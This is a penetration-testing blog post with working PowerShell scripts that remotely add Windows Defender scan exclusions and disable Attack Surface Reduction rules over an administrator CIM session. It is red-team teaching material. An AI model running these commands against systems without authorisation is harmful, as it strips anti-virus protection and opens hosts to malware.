Last week, we covered how to enumerate anti-virus configurations on remote systems. The information you gather that way lets you build a much more targeted attack against the system in question. The natural next questions might be:
- What happens if there are no exception paths?
- What if no extensions are whitelisted?
- Is it possible to modify the anti-virus configuration remotely?
The last question is the one I want to answer, because if we can answer it, then we can answer the first two as well.
To modify anti-virus configs remotely, we follow the same process we used when enumerating remote systems: create a CIM session to the target. We documented this last week, but for a refresher, the following PowerShell commands are an example (modify for your needs; the account you supply needs local administrator rights on the remote system):
- $sessopt = New-CimSessionOption -Protocol DCOM
- $secpasswd = ConvertTo-SecureString "PlainTextPassword" -AsPlainText -Force
- $creds = New-Object System.Management.Automation.PSCredential ("username", $secpasswd)
- $sess = New-CimSession -ComputerName <REMOTE_SYSTEM_IP_OR_HOSTNAME> -Credential $creds -SessionOption $sessopt
Now that the CIM session is established with the remote system, we can move on to the PowerShell cmdlets that let us modify the anti-virus configuration. There are two cmdlets that could be used: Add-MpPreference and Set-MpPreference. Add-MpPreference is used when you want to add to an existing configuration (you are appending to it), and Set-MpPreference is used when you are (over)writing a configuration setting (thanks for helping to explain and verify this @mattifestation).
In this case, I am going to use Set-MpPreference to overwrite any existing exclusions (in my case there aren't any). However, you should evaluate whether you want to overwrite the list or simply append to it, since Set-MpPreference drops any exclusions that are already present. For my command, I want to set the path C:\Temp as an excluded path and exclude all .exe files from being scanned. This is accomplished with the following command:
Set-MpPreference -CimSession $sess -ExclusionPath C:\Temp -ExclusionExtension exe
After running this command, if I were a user on the targeted system, I could see and validate the excluded path and extension in the Windows Defender Security Center's Exclusions menu, similar to the image below:
If you would prefer additional validation, you could use the Get-MpPreference cmdlet against the same CIM session to obtain the remote system's configuration, similar to below:
This validates that we successfully modified the anti-virus exclusion configuration of a remote system. Always confirm the change this way rather than assuming it applied: on newer builds, Tamper Protection can block Set-MpPreference from changing protected Defender settings.
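The whole procedure above in one pass, as an added example that is not part of the original post: it builds the CIM session, records the exclusions already present, appends or overwrites depending on what it found, reads the configuration back to verify, and leaves a restore path. The host name, account and the placeholder values are assumptions; the script prompts for the password instead of embedding it in plaintext as the list above does.

```powershell
# Added example (not from the original post): remote Defender exclusion change with verification.
# Assumptions: $Target and $User are placeholders you fill in; the account is a local administrator
# on the target; DCOM/RPC is reachable; Windows Defender Antivirus is the active AV product there.
$Target = 'WORKSTATION01'      # placeholder host name
$User   = 'CORP\svc_admin'     # placeholder account

$sessopt = New-CimSessionOption -Protocol Dcom
$cred    = Get-Credential -UserName $User -Message "Credentials for $Target"
$sess    = New-CimSession -ComputerName $Target -Credential $cred -SessionOption $sessopt

# Snapshot the current exclusions before touching anything, so they can be restored later.
$before = Get-MpPreference -CimSession $sess
$backup = [pscustomobject]@{
    ExclusionPath      = @($before.ExclusionPath      | Where-Object { $_ })
    ExclusionExtension = @($before.ExclusionExtension | Where-Object { $_ })
}
Write-Host "Existing path exclusions on ${Target}: $($backup.ExclusionPath -join ', ')"

# Add-MpPreference appends to the list; Set-MpPreference replaces it.
# Appending is the less destructive choice when the target already has exclusions.
$newPath = 'C:\Temp'
$newExt  = 'exe'
if ($backup.ExclusionPath.Count -gt 0 -or $backup.ExclusionExtension.Count -gt 0) {
    Add-MpPreference -CimSession $sess -ExclusionPath $newPath -ExclusionExtension $newExt
} else {
    Set-MpPreference -CimSession $sess -ExclusionPath $newPath -ExclusionExtension $newExt
}

# Verify by reading the configuration back through the same session; Tamper Protection
# on newer builds can silently leave protected settings unchanged.
$after = Get-MpPreference -CimSession $sess
$applied = (@($after.ExclusionPath) -contains $newPath) -and (@($after.ExclusionExtension) -contains $newExt)
if (-not $applied) { throw "Exclusion change did not apply on $Target" }
$after | Select-Object ComputerID, ExclusionPath, ExclusionExtension | Format-List

# Clean-up for later: Remove-MpPreference takes the same parameters and undoes the change.
# Remove-MpPreference -CimSession $sess -ExclusionPath $newPath -ExclusionExtension $newExt
Remove-CimSession $sess
```

The `$backup` object is what you would hand back to a client, or feed to Set-MpPreference, to put the host back the way you found it.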
Now, there is another set of rules that is incredibly interesting to attackers and defenders alike: Microsoft's Attack Surface Reduction (ASR) rules. ASR rules are an additional set of rules that attempt to block commonly abused features or functionality used to compromise systems, such as Office applications spawning child processes. ASR rules should absolutely be applied within your environment to help reduce your organization's attack surface.
However, if you need to compromise a system that has ASR enabled, this is another configuration that would need to be modified. Yet again, Set-MpPreference is a cmdlet you can use to accomplish this task. When you run Get-MpPreference, the AttackSurfaceReductionRules_Ids and AttackSurfaceReductionRules_Actions properties show exactly which ASR rules are configured and in which mode:
To disable a specific ASR rule, you could use Set-MpPreference along with the rule's ID and set it to a disabled state. You can do this with a command similar to the following (add -CimSession $sess, as above, to run it against the remote system). Be aware that Set-MpPreference replaces the entire ASR rule list with the IDs you pass; to change the mode of one rule while leaving the others configured, use Add-MpPreference with the same parameters instead:
Set-MpPreference -AttackSurfaceReductionRules_Ids d1e49aac-8f56-4280-b9ba-993a6d77406c -AttackSurfaceReductionRules_Actions Disabled
If you were to run the same Get-MpPreference command, you would now see that AttackSurfaceReductionRules_Actions has a value of "0" for that rule, which is the code for Disabled (1 is Enabled/Block and 2 is AuditMode).
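The ASR steps above, as an added example that is not part of the original post: it pairs the two parallel arrays Get-MpPreference returns into readable rule/mode rows, changes the mode of one rule through Add-MpPreference so the rest of the list survives, and verifies the result. It assumes `$sess` is the CIM session created earlier and that the target runs a Defender build with ASR rules configured; the rule ID is the one used above, which Microsoft documents as "Block all Office applications from creating child processes".

```powershell
# Added example (not from the original post): inspect and change one ASR rule over an existing
# CIM session. Assumes $sess was created as shown earlier in the post.
# Microsoft's documented action codes for AttackSurfaceReductionRules_Actions.
$asrActionName = @{ 0 = 'Disabled'; 1 = 'Enabled'; 2 = 'AuditMode'; 6 = 'Warn' }
$ruleId = 'd1e49aac-8f56-4280-b9ba-993a6d77406c'   # Block all Office applications from creating child processes

function Get-AsrState {
    param([Microsoft.Management.Infrastructure.CimSession]$Session)
    $p = Get-MpPreference -CimSession $Session
    if (-not $p.AttackSurfaceReductionRules_Ids) { return }   # no ASR rules configured
    # The two properties are positionally paired: Ids[i] is governed by Actions[i].
    $ids     = @($p.AttackSurfaceReductionRules_Ids)
    $actions = @($p.AttackSurfaceReductionRules_Actions)
    for ($i = 0; $i -lt $ids.Count; $i++) {
        $code = [int]$actions[$i]
        [pscustomobject]@{
            RuleId = $ids[$i]
            Action = $code
            Mode   = if ($asrActionName.ContainsKey($code)) { $asrActionName[$code] } else { "Unknown($code)" }
        }
    }
}

Write-Host 'ASR rules before:'
Get-AsrState -Session $sess | Format-Table -AutoSize

# Change ONE rule's mode while leaving the rest of the list intact.
# Add-MpPreference with an ID that is already present updates that rule's action;
# Set-MpPreference with a single ID would replace the whole list with that one entry.
Add-MpPreference -CimSession $sess -AttackSurfaceReductionRules_Ids $ruleId `
                 -AttackSurfaceReductionRules_Actions Disabled

Write-Host 'ASR rules after:'
$after = Get-AsrState -Session $sess
$after | Format-Table -AutoSize

# Verify against the remote state rather than trusting that the cmdlet succeeded.
$changed = $after | Where-Object { $_.RuleId -eq $ruleId }
if (-not $changed)           { throw "Rule $ruleId is not present on the target" }
if ($changed.Action -ne 0)   { throw "Rule $ruleId is still in mode $($changed.Mode)" }
Write-Host "Rule $ruleId is now $($changed.Mode)"
```

Run Get-AsrState against a fleet of sessions and the output doubles as a quick defensive audit: any rule that shows up in AuditMode or Disabled where your policy says Enabled is worth a closer look.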
Hopefully this helps show how to modify exclusion rules and the status of ASR rules on a remote system. If you have any questions, please don't hesitate to contact us at FortyNorth Security.